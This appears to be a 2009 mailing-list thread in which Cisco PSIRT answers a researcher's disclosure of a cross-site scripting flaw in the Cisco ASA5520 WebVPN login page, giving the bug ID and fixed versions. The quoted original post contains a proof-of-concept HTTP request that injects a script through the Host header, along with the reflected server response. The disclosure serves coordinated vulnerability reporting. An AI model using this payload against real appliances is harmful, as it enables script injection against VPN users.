RE: Cisco ASA5520 Web VPN Host Header XSS
This is the Cisco PSIRT response to an issue discovered and reported to
Cisco by Bugs NotHugs regarding a cross-site scripting vulnerability in
the Cisco Adaptive Security Appliance (ASA) clientless SSL VPN feature.
Cisco PSIRT greatly appreciates the opportunity to work with researchers
on security vulnerabilities, and welcomes the opportunity to review and
assist in product reports. PSIRT would like to thank Bugs NotHugs for
reporting this issue to us.
Cisco has release an IntelliShield Alert on this vulnerability, which is
available at:
http://tools.cisco.com/security/center/viewAlert.x?alertId=17950. This
and other IntelliShield Alerts are available off the Cisco Security
Center (www.cisco.com/security).
Cisco is currently patching this vulnerability as Cisco bug ID
CSCsy82093 and the fixes will be available in 8.0.3.31, 8.1.2.22, and
8.2.0. These images will soon be available for download at either
http://www.cisco.com/cgi-bin/tablebuild.pl/asa or
http://www.cisco.com/cgi-bin/tablebuild.pl/asa-interim.
To check on the latest versions with fixed releases please consult the
Cisco Bug Toolkit
http://tools.cisco.com/Support/BugToolKit/action.do?hdnAction=searchBugs
.
-----Original Message-----
From: Bugs NotHugs [mailto:bugsnothugs@xxxxxxxxx]
Sent: Tuesday, March 31, 2009 6:18 AM
To: bugtraq; fd
Subject: Cisco ASA5520 Web VPN Host Header XSS
- Cisco ASA5520 Web VPN Host Header XSS
- Description
Cross-site scripting.
- Product
Cisco, ASA5520, IOS 7.2(2)22
- PoC
Modified request:
POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://198.133.219.23/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR
1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
Response:
HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1
Content-Length: 5556
<html>
<!--
Copyright (c) 2004, 2005 by Cisco Systems, Inc.
All rights reserved.
-->
<head>
<META http-equiv="PICS-Label" content='(PICS-1.1
"http://www.rsac.org/ratingsv01.html" l gen true comment "RSACi North
America Server" for
"http://"'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.owasp.org/+webvpn+/index.html" on
"2000.11.02T23:36-0800" r (n 0 s 0 v 0 l 0))'>
<meta http-equiv="Window-target" content="_top">
<title>WebVPN Service</title>
- Solution
None
- Timeline
2007-09-17: Vulnerability Discovered
2008-02-15: Disclosed to Vendor (auto-reply)
2009-04-02: Disclosed to Public (XSS is so 1999)
--
BugsNotHugs
Shared Vulnerability Disclosure Account